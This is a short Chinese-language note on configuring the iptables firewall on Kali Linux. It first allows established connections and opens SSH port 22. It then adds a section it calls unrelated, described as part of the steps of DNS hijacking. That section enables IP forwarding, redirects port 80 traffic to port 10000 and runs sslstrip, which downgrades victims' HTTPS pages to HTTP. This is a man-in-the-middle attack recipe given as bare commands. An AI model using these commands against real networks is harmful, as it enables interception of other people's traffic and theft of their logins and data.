由于kali防火墙iptables默认关闭了与外部设备建立连接且只开放了22端口,因此需要开启与外部设备建立连接并打开相应的端口。
1.配置本机可以与外部设备建立连接:iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT;
2.配置本机开放的端口,如SSH端口22:iptables -A INPUT -p tcp --dport 22 -j ACCEPT;
以下内容与标题无关,是DNS劫持的部分步骤。
开启端口转发:echo 1 > /proc/sys/net/ipv4/ip_forward
开启80端口的数据转发到10000端口:iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 10000
执行sslstrip欺骗,把网页中的https协议转换为http协议:sslstrip -l 10000
以上配置仅生效一次,重启后需重新设置。